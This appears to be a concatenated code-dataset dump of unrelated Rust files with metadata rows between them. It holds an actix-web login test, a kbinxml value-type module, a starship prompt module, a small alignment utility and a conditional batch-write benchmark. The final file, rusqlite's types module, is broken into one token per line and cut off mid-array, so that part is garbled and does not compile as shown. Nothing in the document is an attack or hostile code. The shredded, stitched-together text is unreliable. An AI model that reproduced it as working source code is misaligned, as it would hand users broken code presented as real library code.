async fn test_login_user_not_found_with_email() {
let docker = clients::Cli::default();
let postgres = docker.run(Postgres::default());
let pool = config::db::init_db_pool(
format!(
"postgres://postgres:[email protected]:{}/postgres",
postgres.get_host_port_ipv4(5432)
)
.as_str(),
);
config::db::run_migration(&mut pool.get().unwrap());
let app = test::init_service(
App::new()
.wrap(
Cors::default()
.send_wildcard()
.allowed_methods(vec!["GET", "POST", "PUT", "DELETE"])
.allowed_header(http::header::CONTENT_TYPE)
.max_age(3600),
)
.app_data(web::Data::new(pool.clone()))
.wrap(actix_web::middleware::Logger::default())
.wrap(crate::middleware::auth_middleware::Authentication)
.wrap_fn(|req, srv| srv.call(req).map(|res| res))
.configure(crate::config::app::config_services),
)
.await;
test::TestRequest::post()
.uri("/api/auth/signup")
.insert_header(header::ContentType::json())
.set_payload(
r#"{"username":"admin","email":"[email protected]","password":"password"}"#
.as_bytes(),
)
.send_request(&app)
.await;
let resp = test::TestRequest::post()
.uri("/api/auth/login")
.insert_header(header::ContentType::json())
.set_payload(r#"{"username_or_email":"[email protected]","password":"123456"}"#.as_bytes())
.send_request(&app)
.await;
assert_eq!(resp.status(), StatusCode::UNAUTHORIZED);
}
}
| true |
67599042cbcb143251aea523b3da9633ca194b96
|
Rust
|
mbilker/kbinxml-rs
|
/kbinxml/src/value/mod.rs
|
UTF-8
| 22,862 | 2.515625 | 3 |
[
"MIT"
] |
permissive
|
use std::borrow::Cow;
use std::convert::TryFrom;
use std::fmt;
use std::io::Cursor;
use std::net::Ipv4Addr;
use rustc_hex::FromHex;
use snafu::ResultExt;
use crate::error::{HexSnafu, KbinError, Result};
use crate::node_types::StandardType;
use crate::types::{FromKbinBytes, FromKbinString, IntoKbinBytes};
mod array;
pub use self::array::ValueArray;
macro_rules! construct_types {
(
$(
($konst:ident, $($value_type:tt)*);
)+
) => {
#[derive(Clone, PartialEq)]
pub enum Value {
$(
$konst($($value_type)*),
)+
Binary(Vec<u8>),
Time(u32),
Attribute(String),
Array(ValueArray),
}
$(
impl From<$($value_type)*> for Value {
fn from(value: $($value_type)*) -> Value {
Value::$konst(value)
}
}
impl TryFrom<Value> for $($value_type)* {
type Error = KbinError;
fn try_from(value: Value) -> Result<Self> {
match value {
Value::$konst(v) => Ok(v),
value => {
Err(KbinError::ValueTypeMismatch {
node_type: StandardType::$konst,
value,
})
},
}
}
}
impl TryFrom<&Value> for $($value_type)* {
type Error = KbinError;
fn try_from(value: &Value) -> Result<Self> {
match value {
Value::$konst(ref v) => Ok(v.clone()),
value => {
Err(KbinError::ValueTypeMismatch {
node_type: StandardType::$konst,
value: value.clone(),
})
},
}
}
}
)+
impl Value {
pub fn standard_type(&self) -> StandardType {
match *self {
$(
Value::$konst(_) => StandardType::$konst,
)+
Value::Binary(_) => StandardType::Binary,
Value::Time(_) => StandardType::Time,
Value::Attribute(_) => StandardType::Attribute,
Value::Array(ref value) => value.standard_type(),
}
}
}
}
}
macro_rules! tuple {
(
$($konst:ident),*$(,)?
) => {
pub fn from_standard_type(
node_type: StandardType,
is_array: bool,
input: &[u8],
) -> Result<Option<Value>> {
let node_size = node_type.size * node_type.count;
if is_array {
let value = match ValueArray::from_standard_type(node_type, input)? {
Some(value) => value,
None => return Err(KbinError::InvalidState),
};
debug!(
"Value::from_standard_type({:?}) input: 0x{:02x?} => {:?}",
node_type, input, value
);
return Ok(Some(Value::Array(value)));
}
match node_type {
StandardType::String | StandardType::Binary => {},
_ => {
if input.len() != node_size {
return Err(KbinError::SizeMismatch {
node_type: node_type.name,
expected: node_size,
actual: input.len(),
});
}
},
};
let mut reader = Cursor::new(input);
let value = match node_type {
StandardType::NodeStart |
StandardType::NodeEnd |
StandardType::FileEnd |
StandardType::Attribute |
StandardType::String => return Ok(None),
StandardType::S8 => i8::from_kbin_bytes(&mut reader).map(Value::S8)?,
StandardType::U8 => u8::from_kbin_bytes(&mut reader).map(Value::U8)?,
StandardType::S16 => i16::from_kbin_bytes(&mut reader).map(Value::S16)?,
StandardType::U16 => u16::from_kbin_bytes(&mut reader).map(Value::U16)?,
StandardType::S32 => i32::from_kbin_bytes(&mut reader).map(Value::S32)?,
StandardType::U32 => u32::from_kbin_bytes(&mut reader).map(Value::U32)?,
StandardType::S64 => i64::from_kbin_bytes(&mut reader).map(Value::S64)?,
StandardType::U64 => u64::from_kbin_bytes(&mut reader).map(Value::U64)?,
StandardType::Binary => Value::Binary(input.to_vec()),
StandardType::Time => u32::from_kbin_bytes(&mut reader).map(Value::Time)?,
StandardType::Ip4 => Ipv4Addr::from_kbin_bytes(&mut reader).map(Value::Ip4)?,
StandardType::Float => f32::from_kbin_bytes(&mut reader).map(Value::Float)?,
StandardType::Double => f64::from_kbin_bytes(&mut reader).map(Value::Double)?,
StandardType::Boolean => bool::from_kbin_bytes(&mut reader).map(Value::Boolean)?,
$(
StandardType::$konst => {
FromKbinBytes::from_kbin_bytes(&mut reader).map(Value::$konst)?
},
)*
};
debug!("Value::from_standard_type({:?}) input: 0x{:02x?} => {:?}", node_type, input, value);
Ok(Some(value))
}
pub fn from_string(
node_type: StandardType,
input: &str,
is_array: bool,
arr_count: usize,
) -> Result<Value> {
trace!(
"Value::from_string({:?}, is_array: {}, arr_count: {}) => input: {:?}",
node_type,
is_array,
arr_count,
input
);
if is_array {
let value = match node_type.count {
0 => return Err(KbinError::InvalidState.into()),
count => Value::Array(ValueArray::from_string(node_type, count, input, arr_count)?),
};
debug!("Value::from_string({:?}) input: {:?} => {:?}", node_type, input, value);
return Ok(value);
}
let value = match node_type {
StandardType::NodeStart |
StandardType::NodeEnd |
StandardType::FileEnd => return Err(KbinError::InvalidNodeType { node_type }),
StandardType::S8 => i8::from_kbin_string(input).map(Value::S8)?,
StandardType::U8 => u8::from_kbin_string(input).map(Value::U8)?,
StandardType::S16 => i16::from_kbin_string(input).map(Value::S16)?,
StandardType::U16 => u16::from_kbin_string(input).map(Value::U16)?,
StandardType::S32 => i32::from_kbin_string(input).map(Value::S32)?,
StandardType::U32 => u32::from_kbin_string(input).map(Value::U32)?,
StandardType::S64 => i64::from_kbin_string(input).map(Value::S64)?,
StandardType::U64 => u64::from_kbin_string(input).map(Value::U64)?,
StandardType::Binary => input.from_hex().map(Value::Binary).context(HexSnafu)?,
StandardType::String => Value::String(input.to_owned()),
StandardType::Attribute => Value::Attribute(input.to_owned()),
StandardType::Ip4 => Ipv4Addr::from_kbin_string(input).map(Value::Ip4)?,
StandardType::Time => u32::from_kbin_string(input).map(Value::Time)?,
StandardType::Float => f32::from_kbin_string(input).map(Value::Float)?,
StandardType::Double => f64::from_kbin_string(input).map(Value::Double)?,
StandardType::Boolean => bool::from_kbin_string(input).map(Value::Boolean)?,
$(
StandardType::$konst => FromKbinString::from_kbin_string(input)
.map(Value::$konst)?,
)*
};
debug!("Value::from_string({:?}) input: {:?} => {:?}", node_type, input, value);
Ok(value)
}
fn to_bytes_inner(&self, output: &mut Vec<u8>) -> Result<()> {
debug!("Value::to_bytes_inner(self: {:?})", self);
match self {
Value::S8(n) => n.write_kbin_bytes(output),
Value::U8(n) => n.write_kbin_bytes(output),
Value::S16(n) => n.write_kbin_bytes(output),
Value::U16(n) => n.write_kbin_bytes(output),
Value::S32(n) => n.write_kbin_bytes(output),
Value::U32(n) => n.write_kbin_bytes(output),
Value::S64(n) => n.write_kbin_bytes(output),
Value::U64(n) => n.write_kbin_bytes(output),
Value::Binary(data) => output.extend_from_slice(data),
Value::Time(n) => n.write_kbin_bytes(output),
Value::Ip4(addr) => addr.write_kbin_bytes(output),
Value::Float(n) => n.write_kbin_bytes(output),
Value::Double(n) => n.write_kbin_bytes(output),
Value::Boolean(v) => v.write_kbin_bytes(output),
Value::Array(value) => value.to_bytes_into(output)?,
Value::Attribute(_) |
Value::String(_) => {
return Err(KbinError::InvalidNodeType { node_type: self.standard_type() });
},
$(
Value::$konst(value) => {
output.reserve(value.len() * StandardType::$konst.size);
value.write_kbin_bytes(output);
},
)*
};
Ok(())
}
};
}
impl Value {
tuple! {
S8_2, S8_3, S8_4, Vs8,
U8_2, U8_3, U8_4, Vu8,
Boolean2, Boolean3, Boolean4, Vb,
S16_2, S16_3, S16_4, Vs16,
S32_2, S32_3, S32_4,
S64_2, S64_3, S64_4,
U16_2, U16_3, U16_4, Vu16,
U32_2, U32_3, U32_4,
U64_2, U64_3, U64_4,
Float2, Float3, Float4,
Double2, Double3, Double4,
}
pub fn to_bytes(&self) -> Result<Vec<u8>> {
let mut output = Vec::new();
self.to_bytes_inner(&mut output)?;
Ok(output)
}
#[inline]
pub fn to_bytes_into(&self, output: &mut Vec<u8>) -> Result<()> {
self.to_bytes_inner(output)
}
pub fn as_i8(&self) -> Result<i8> {
match self {
Value::S8(ref n) => Ok(*n),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::S8,
value: value.clone(),
}),
}
}
pub fn as_u8(&self) -> Result<u8> {
match self {
Value::U8(ref n) => Ok(*n),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::U8,
value: value.clone(),
}),
}
}
pub fn as_i16(&self) -> Result<i16> {
match self {
Value::S16(ref n) => Ok(*n),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::S16,
value: value.clone(),
}),
}
}
pub fn as_u16(&self) -> Result<u16> {
match self {
Value::U16(ref n) => Ok(*n),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::U16,
value: value.clone(),
}),
}
}
pub fn as_i32(&self) -> Result<i32> {
match self {
Value::S32(ref n) => Ok(*n),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::S32,
value: value.clone(),
}),
}
}
pub fn as_u32(&self) -> Result<u32> {
match self {
Value::U32(ref n) => Ok(*n),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::U32,
value: value.clone(),
}),
}
}
pub fn as_i64(&self) -> Result<i64> {
match self {
Value::S64(ref n) => Ok(*n),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::S64,
value: value.clone(),
}),
}
}
pub fn as_u64(&self) -> Result<u64> {
match self {
Value::U64(ref n) => Ok(*n),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::U64,
value: value.clone(),
}),
}
}
pub fn as_slice(&self) -> Result<&[u8]> {
match self {
Value::Binary(ref data) => Ok(data),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::Binary,
value: value.clone(),
}),
}
}
pub fn as_str(&self) -> Result<&str> {
match self {
Value::String(ref s) => Ok(s),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::String,
value: value.clone(),
}),
}
}
pub fn as_string(self) -> Result<String> {
match self {
Value::String(s) => Ok(s),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::String,
value,
}),
}
}
pub fn as_attribute(self) -> Result<String> {
match self {
Value::Attribute(s) => Ok(s),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::Attribute,
value,
}),
}
}
pub fn as_binary(&self) -> Result<&[u8]> {
match self {
Value::Binary(ref data) => Ok(data),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::Binary,
value: value.clone(),
}),
}
}
pub fn as_array(&self) -> Result<&ValueArray> {
match self {
Value::Array(ref values) => Ok(values),
value => Err(KbinError::ExpectedValueArray {
value: value.clone(),
}),
}
}
pub fn into_binary(self) -> Result<Vec<u8>> {
match self {
Value::Binary(data) => Ok(data),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::Binary,
value,
}),
}
}
}
impl TryFrom<Value> for Vec<u8> {
type Error = KbinError;
fn try_from(value: Value) -> Result<Self> {
// An array of unsigned 8-bit integers can either be `Binary` or a literal
// array of unsigned 8-bit integers.
match value {
Value::Binary(data) => Ok(data),
Value::Array(values) => match values {
ValueArray::U8(values) => Ok(values),
values => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::U8,
value: Value::Array(values),
}),
},
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::Binary,
value,
}),
}
}
}
impl TryFrom<&Value> for Vec<u8> {
type Error = KbinError;
fn try_from(value: &Value) -> Result<Self> {
match value {
Value::Binary(ref data) => Ok(data.to_vec()),
Value::Array(ref values) => match values.clone() {
ValueArray::U8(values) => Ok(values),
values => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::U8,
value: Value::Array(values),
}),
},
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::Binary,
value: value.clone(),
}),
}
}
}
impl TryFrom<Value> for Cow<'_, str> {
type Error = KbinError;
fn try_from(value: Value) -> Result<Self> {
match value {
Value::String(v) => Ok(Cow::Owned(v)),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::String,
value,
}),
}
}
}
impl TryFrom<&Value> for Cow<'_, str> {
type Error = KbinError;
fn try_from(value: &Value) -> Result<Self> {
match value {
Value::String(ref v) => Ok(Cow::Owned(v.clone())),
value => Err(KbinError::ValueTypeMismatch {
node_type: StandardType::String,
value: value.clone(),
}),
}
}
}
impl From<Vec<u8>> for Value {
fn from(value: Vec<u8>) -> Value {
Value::Binary(value)
}
}
impl fmt::Debug for Value {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
macro_rules! field {
(
display: [$($konst_display:ident),*],
debug: [$($konst_debug:ident),*]
) => {
match *self {
$(
Value::$konst_display(ref v) => write!(f, concat!(stringify!($konst_display), "({})"), v),
)*
$(
Value::$konst_debug(ref v) => write!(f, concat!(stringify!($konst_debug), "({:?})"), v),
)*
Value::Binary(ref v) => write!(f, "Binary(0x{:02x?})", v),
Value::Array(ref value) => if f.alternate() {
write!(f, "Array({:#?})", value)
} else {
write!(f, "Array({:?})", value)
},
}
};
}
field! {
display: [
S8, S16, S32, S64,
U8, U16, U32, U64,
Float, Double, Boolean
],
debug: [
String, Time, Ip4,
Attribute,
S8_2, U8_2, S16_2, U16_2, S32_2, U32_2, S64_2, U64_2, Float2, Double2, Boolean2,
S8_3, U8_3, S16_3, U16_3, S32_3, U32_3, S64_3, U64_3, Float3, Double3, Boolean3,
S8_4, U8_4, S16_4, U16_4, S32_4, U32_4, S64_4, U64_4, Float4, Double4, Boolean4,
Vs16, Vu16,
Vs8, Vu8, Vb
]
}
}
}
impl fmt::Display for Value {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
macro_rules! display_value {
(
simple: [$($simple:ident),*],
tuple: [$($tuple:ident),*],
value: [$($parent:ident => [$($child:ident),*]),*]
) => {
match self {
$(
Value::$simple(v) => fmt::Display::fmt(v, f),
)*
$(
Value::$tuple(values) => {
for (i, v) in values.iter().enumerate() {
if i > 0 {
f.write_str(" ")?;
}
fmt::Display::fmt(v, f)?;
}
Ok(())
},
)*
$(
$(
Value::$child(values) => {
for (i, v) in values.iter().enumerate() {
if i > 0 {
f.write_str(" ")?;
}
fmt::Display::fmt(&Value::$parent(*v), f)?;
}
Ok(())
},
)*
)*
Value::Binary(buf) => {
for n in buf {
write!(f, "{:02x}", n)?;
}
Ok(())
},
Value::Float(n) => write!(f, "{:.6}", n),
Value::Double(n) => write!(f, "{:.6}", n),
Value::Boolean(b) => match b {
true => f.write_str("1"),
false => f.write_str("0"),
},
}
};
}
display_value! {
simple: [
S8, U8, S16, U16, S32, U32, S64, U64,
String, Ip4, Time, Attribute,
Array
],
tuple: [
S8_2, U8_2, S16_2, U16_2, S32_2, U32_2, S64_2, U64_2,
S8_3, U8_3, S16_3, U16_3, S32_3, U32_3, S64_3, U64_3,
S8_4, U8_4, S16_4, U16_4, S32_4, U32_4, S64_4, U64_4,
Vs8, Vu8, Vs16, Vu16
],
value: [
Float => [Float2, Float3, Float4],
Double => [Double2, Double3, Double4],
Boolean => [Boolean2, Boolean3, Boolean4, Vb]
]
}
}
}
construct_types! {
(S8, i8);
(U8, u8);
(S16, i16);
(U16, u16);
(S32, i32);
(U32, u32);
(S64, i64);
(U64, u64);
//(Binary, Vec<u8>);
(String, String);
(Ip4, Ipv4Addr);
//(Time, u32);
(Float, f32);
(Double, f64);
(S8_2, [i8; 2]);
(U8_2, [u8; 2]);
(S16_2, [i16; 2]);
(U16_2, [u16; 2]);
(S32_2, [i32; 2]);
(U32_2, [u32; 2]);
(S64_2, [i64; 2]);
(U64_2, [u64; 2]);
(Float2, [f32; 2]);
(Double2, [f64; 2]);
(S8_3, [i8; 3]);
(U8_3, [u8; 3]);
(S16_3, [i16; 3]);
(U16_3, [u16; 3]);
(S32_3, [i32; 3]);
(U32_3, [u32; 3]);
(S64_3, [i64; 3]);
(U64_3, [u64; 3]);
(Float3, [f32; 3]);
(Double3, [f64; 3]);
(S8_4, [i8; 4]);
(U8_4, [u8; 4]);
(S16_4, [i16; 4]);
(U16_4, [u16; 4]);
(S32_4, [i32; 4]);
(U32_4, [u32; 4]);
(S64_4, [i64; 4]);
(U64_4, [u64; 4]);
(Float4, [f32; 4]);
(Double4, [f64; 4]);
//(Attribute, String);
// no 47
(Vs8, [i8; 16]);
(Vu8, [u8; 16]);
(Vs16, [i16; 8]);
(Vu16, [u16; 8]);
(Boolean, bool);
(Boolean2, [bool; 2]);
(Boolean3, [bool; 3]);
(Boolean4, [bool; 4]);
(Vb, [bool; 16]);
}
| true |
d6ffcd52b234e81073dfd38af9ddcfe220e06fd1
|
Rust
|
baitcenter/starship
|
/src/modules/character.rs
|
UTF-8
| 1,450 | 3.390625 | 3 |
[
"ISC"
] |
permissive
|
use super::{Context, Module};
use ansi_term::Color;
/// Creates a module for the prompt character
///
/// The character segment prints an arrow character in a color dependant on the exit-
/// code of the last executed command:
/// - If the exit-code was "0", the arrow will be formatted with `COLOR_SUCCESS`
/// (green by default)
/// - If the exit-code was anything else, the arrow will be formatted with
/// `COLOR_FAILURE` (red by default)
pub fn module<'a>(context: &'a Context) -> Option<Module<'a>> {
const SUCCESS_CHAR: &str = "➜";
const FAILURE_CHAR: &str = "✖";
let color_success = Color::Green.bold();
let color_failure = Color::Red.bold();
let mut module = context.new_module("character")?;
module.get_prefix().set_value("");
let arguments = &context.arguments;
let use_symbol = module
.config_value_bool("use_symbol_for_status")
.unwrap_or(false);
let exit_success = arguments.value_of("status_code").unwrap_or("0") == "0";
/* If an error symbol is set in the config, use symbols to indicate
success/failure, in addition to color */
let symbol = if use_symbol && !exit_success {
module.new_segment("error_symbol", FAILURE_CHAR)
} else {
module.new_segment("symbol", SUCCESS_CHAR)
};
if exit_success {
symbol.set_style(color_success.bold());
} else {
symbol.set_style(color_failure.bold());
};
Some(module)
}
| true |
1c6c519578e06b49c64df78b8397c8dfab63d581
|
Rust
|
adarqui/small-bites
|
/rust/misc/align.rs
|
UTF-8
| 476 | 2.9375 | 3 |
[] |
no_license
|
use std::os;
fn align_to(size: uint, align: uint) -> uint {
assert!(align != 0);
(size + align - 1) & !(align - 1)
}
fn print_uint(x:uint) {
println!("{}",x);
}
fn main() {
let argv = os::args();
let size = from_str::<uint>(argv[1]).unwrap();
// println!("{}",size);
let align = from_str::<uint>(argv[2]).unwrap();
// println!("{}", align);
let aligned = align_to(size,align);
println!("{} by {} = {}", size, align, aligned);
// print_uint(*argv[1]);
}
| true |
0a697884dcadc9e65cbb6a18086fcdf54e47af5b
|
Rust
|
placrosse/experiments
|
/conditional-batch-write/rust/src/main.rs
|
UTF-8
| 7,072 | 2.703125 | 3 |
[
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
/*
* Copyright 2015 Treode, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#![feature(collections)]
#![feature(slice_patterns)]
extern crate rand;
extern crate time;
use std::collections::{BTreeMap, HashMap};
use std::collections::Bound::{Included, Unbounded};
use std::vec::Vec;
use rand::thread_rng;
use rand::distributions::Sample;
use rand::distributions::range::Range;
#[derive(Clone, Copy, Debug, Default, Eq, PartialEq)]
struct Value {
pub v: i32,
pub t: u32
}
#[derive(Clone, Copy, Debug, Default, Eq, PartialEq)]
struct Row {
pub k: i32,
pub v: i32
}
#[derive(Clone, Copy, Debug, Default, Eq, PartialEq)]
struct Cell {
pub k: i32,
pub v: i32,
pub t: u32
}
#[derive(Clone, Copy, Debug, Eq, PartialEq)]
enum WriteResult {
Ok { t: u32 },
Stale { cond: u32, max: u32 }
}
trait Table {
fn time(&self) -> u32;
fn read(&mut self, t: u32, ks: &[i32], vs: &mut [Value]);
fn write(&mut self, t: u32, rs: &[Row]) -> WriteResult;
fn scan(&self) -> Vec<Cell>;
}
fn broker(table: &mut Table, ntransfers: u32) {
let mut rng = thread_rng();
let mut ract = Range::new(0, 100);
let mut ramt = Range::new(0, 1000);
let mut nstale = 0;
for _ in 0..ntransfers {
let a1 = ract.sample(&mut rng);
let mut a2 = ract.sample(&mut rng);
while a2 == a1 {
a2 = ract.sample(&mut rng);
}
let n = ramt.sample(&mut rng);
let rt = table.time();
let mut vs = [Value::default(); 2];
table.read(rt, &[a1, a2], &mut vs);
let r1 = Row { k: a1, v: vs[0].v - n };
let r2 = Row { k: a2, v: vs[1].v + n };
match table.write(rt, &[r1, r2]) {
WriteResult::Stale { .. } => nstale += 1,
_ => ()
}
}
assert!(nstale < ntransfers / 2);
}
fn expect_money_conserved(table: &Table) {
let mut history: BTreeMap<u32, Vec<Row>> = BTreeMap::new();
for c in table.scan() {
history.entry(c.t).or_insert(Vec::new()).push(Row { k: c.k, v: c.v });
}
let mut tracker: HashMap<i32, i32> = HashMap::new();
for (_, rs) in history {
for r in rs {
tracker.insert(r.k, r.v);
}
let mut sum = 0;
for (_, v) in tracker.clone() {
sum += v;
}
assert! (sum == 0);
}
}
struct HashMapOfTreeMap {
time: u32,
table: HashMap<i32, BTreeMap<u32, i32>>
}
impl HashMapOfTreeMap {
pub fn new() -> HashMapOfTreeMap {
HashMapOfTreeMap {
time: 0,
table: HashMap::new()
}
}
fn raise(&mut self, t: u32) {
if self.time < t {
self.time = t;
}
}
fn read_row(&self, t: u32, k: i32) -> Value {
let x = u32::max_value() - t;
match self.table.get(&k) {
Some(vs) =>
match vs.range(Included(&x), Unbounded).min() {
Some((t, v)) => Value { v: *v, t: u32::max_value() - *t },
None => Value::default()
},
None => Value::default()
}
}
fn prepare_row(&self, k: i32) -> u32 {
match self.table.get(&k) {
Some(vs) =>
match vs.iter().next() {
Some((x, _)) => u32::max_value() - x,
None => 0
},
None => 0
}
}
fn prepare_rows(&self, rs: &[Row]) -> u32 {
let mut max = 0;
for i in 0..rs.len() {
let t = self.prepare_row(rs[i].k);
if max < t {
max = t
}
}
max
}
fn commit_row(&mut self, t: u32, r: Row) {
let mut vs = self.table.entry(r.k).or_insert_with(BTreeMap::new);
vs.insert(u32::max_value() - t, r.v);
}
fn commit_rows(&mut self, rs: &[Row]) -> u32 {
self.time += 1;
let t = self.time;
for i in 0..rs.len() {
self.commit_row(t, rs[i])
}
t
}
}
impl Table for HashMapOfTreeMap {
fn time(&self) -> u32 {
self.time
}
fn read(&mut self, t: u32, ks: &[i32], vs: &mut [Value]) {
self.raise(t);
for i in 0..ks.len() {
vs[i] = self.read_row(t, ks[i]);
}
}
fn write (&mut self, t: u32, rs: &[Row]) -> WriteResult {
self.raise(t);
let m = self.prepare_rows(rs);
if m > t {
return WriteResult::Stale { cond: t, max: m };
}
let w = self.commit_rows(rs);
WriteResult::Ok { t: w }
}
fn scan(&self) -> Vec<Cell> {
let mut cs: Vec<Cell> = Vec::new();
for (k, vs) in self.table.clone() {
for (t, v) in vs {
cs.push(Cell { k: k, v: v, t: u32::max_value() - t });
}
}
return cs;
}
}
#[test]
fn a_table_should_read_0_for_any_key() {
let mut table = HashMapOfTreeMap::new();
let mut vs = [Value::default(); 1];
table.read (0, &[0], &mut vs);
match vs {
[Value { v: 0, t: 0}] => (),
_ => assert!(false)
}
}
#[test]
fn a_table_should_read_what_was_put() {
let mut table = HashMapOfTreeMap::new();
table.write(0, &[Row { k: 0, v: 1 }]);
let mut vs = [Value::default(); 1];
table.read (1, &[0], &mut vs);
assert_eq!(vs, [Value { v: 1, t: 1 }]);
}
#[test]
fn a_table_should_read_and_write_batches() {
let mut table = HashMapOfTreeMap::new();
table.write(0, &[Row { k: 0, v: 1 }, Row { k: 1, v: 2 }]);
let mut vs = [Value::default(); 2];
table.read (1, &[0, 1], &mut vs);
assert_eq!(vs, [Value { v: 1, t: 1 }, Value { v: 2, t: 1 }]);
}
#[test]
fn a_table_should_reject_a_stale_write() {
let mut table = HashMapOfTreeMap::new();
table.write(0, &[Row { k: 0, v: 1 }]);
assert_eq!(table.write(0, &[Row { k: 0, v: 2 }]), WriteResult::Stale { cond: 0, max: 1 });
let mut vs = [Value::default(); 1];
table.read (1, &[0], &mut vs);
assert_eq!(vs, [Value { v: 1, t: 1 }]);
}
#[test]
fn a_table_should_preserve_the_money_supply() {
let mut table = HashMapOfTreeMap::new();
broker(&mut table, 1000);
expect_money_conserved(&table);
}
fn main() {
let nhits = 20;
let ntrials = 2000;
let nnanos = 60 * 1000 * 1000 * 1000;
let ntransfers = 1000;
let nbrokers = 8;
let tolerance = 0.05;
let ops = (ntransfers * nbrokers) as f64;
let million = (1000 * 1000) as f64;
let mut sum = 0.0;
let mut hits = 0;
let mut trial = 0;
let limit = time::precise_time_ns() + nnanos;
while hits < nhits && trial < ntrials && time::precise_time_ns() < limit {
let mut table = HashMapOfTreeMap::new();
let start = time::precise_time_ns();
for _ in 0..nbrokers {
broker(&mut table, ntransfers);
}
let end = time::precise_time_ns();
let ns = (end - start) as f64;
let x = ops / ns * million;
sum += x;
let n = (trial + 1) as f64;
let mean = sum / n;
let dev = (x - mean).abs() / mean;
if dev <= tolerance {
println!("{:5} {:8.2} ops/ms ({:8.2})", trial, x, mean);
hits += 1;
}
trial += 1;
}
}
| true |
adc963923f6e51e41c840839859e1b72369ecb22
|
Rust
|
marco-c/gecko-dev-wordified-and-comments-removed
|
/third_party/rust/rusqlite/src/types/mod.rs
|
UTF-8
| 12,227 | 2.578125 | 3 |
[
"LicenseRef-scancode-unknown-license-reference",
"MIT",
"LicenseRef-scancode-public-domain"
] |
permissive
|
#
!
[
cfg_attr
(
feature
=
"
time
"
doc
=
r
#
#
"
For
example
to
store
datetimes
as
i64
s
counting
the
number
of
seconds
since
the
Unix
epoch
:
use
rusqlite
:
:
types
:
:
{
FromSql
FromSqlError
FromSqlResult
ToSql
ToSqlOutput
ValueRef
}
;
use
rusqlite
:
:
Result
;
pub
struct
DateTimeSql
(
pub
time
:
:
OffsetDateTime
)
;
impl
FromSql
for
DateTimeSql
{
fn
column_result
(
value
:
ValueRef
)
-
>
FromSqlResult
<
Self
>
{
i64
:
:
column_result
(
value
)
.
and_then
(
|
as_i64
|
{
time
:
:
OffsetDateTime
:
:
from_unix_timestamp
(
as_i64
)
.
map
(
|
odt
|
DateTimeSql
(
odt
)
)
.
map_err
(
|
err
|
FromSqlError
:
:
Other
(
Box
:
:
new
(
err
)
)
)
}
)
}
}
impl
ToSql
for
DateTimeSql
{
fn
to_sql
(
&
self
)
-
>
Result
<
ToSqlOutput
>
{
Ok
(
self
.
0
.
unix_timestamp
(
)
.
into
(
)
)
}
}
"
#
#
)
]
pub
use
self
:
:
from_sql
:
:
{
FromSql
FromSqlError
FromSqlResult
}
;
pub
use
self
:
:
to_sql
:
:
{
ToSql
ToSqlOutput
}
;
pub
use
self
:
:
value
:
:
Value
;
pub
use
self
:
:
value_ref
:
:
ValueRef
;
use
std
:
:
fmt
;
#
[
cfg
(
feature
=
"
chrono
"
)
]
#
[
cfg_attr
(
docsrs
doc
(
cfg
(
feature
=
"
chrono
"
)
)
)
]
mod
chrono
;
mod
from_sql
;
#
[
cfg
(
feature
=
"
serde_json
"
)
]
#
[
cfg_attr
(
docsrs
doc
(
cfg
(
feature
=
"
serde_json
"
)
)
)
]
mod
serde_json
;
#
[
cfg
(
feature
=
"
time
"
)
]
#
[
cfg_attr
(
docsrs
doc
(
cfg
(
feature
=
"
time
"
)
)
)
]
mod
time
;
mod
to_sql
;
#
[
cfg
(
feature
=
"
url
"
)
]
#
[
cfg_attr
(
docsrs
doc
(
cfg
(
feature
=
"
url
"
)
)
)
]
mod
url
;
mod
value
;
mod
value_ref
;
#
[
derive
(
Copy
Clone
)
]
pub
struct
Null
;
#
[
derive
(
Clone
Debug
PartialEq
Eq
)
]
pub
enum
Type
{
Null
Integer
Real
Text
Blob
}
impl
fmt
:
:
Display
for
Type
{
fn
fmt
(
&
self
f
:
&
mut
fmt
:
:
Formatter
<
'
_
>
)
-
>
fmt
:
:
Result
{
match
*
self
{
Type
:
:
Null
=
>
f
.
pad
(
"
Null
"
)
Type
:
:
Integer
=
>
f
.
pad
(
"
Integer
"
)
Type
:
:
Real
=
>
f
.
pad
(
"
Real
"
)
Type
:
:
Text
=
>
f
.
pad
(
"
Text
"
)
Type
:
:
Blob
=
>
f
.
pad
(
"
Blob
"
)
}
}
}
#
[
cfg
(
test
)
]
mod
test
{
use
super
:
:
Value
;
use
crate
:
:
{
params
Connection
Error
Result
Statement
}
;
use
std
:
:
os
:
:
raw
:
:
{
c_double
c_int
}
;
fn
checked_memory_handle
(
)
-
>
Result
<
Connection
>
{
let
db
=
Connection
:
:
open_in_memory
(
)
?
;
db
.
execute_batch
(
"
CREATE
TABLE
foo
(
b
BLOB
t
TEXT
i
INTEGER
f
FLOAT
n
)
"
)
?
;
Ok
(
db
)
}
#
[
test
]
fn
test_blob
(
)
-
>
Result
<
(
)
>
{
let
db
=
checked_memory_handle
(
)
?
;
let
v1234
=
vec
!
[
1u8
2
3
4
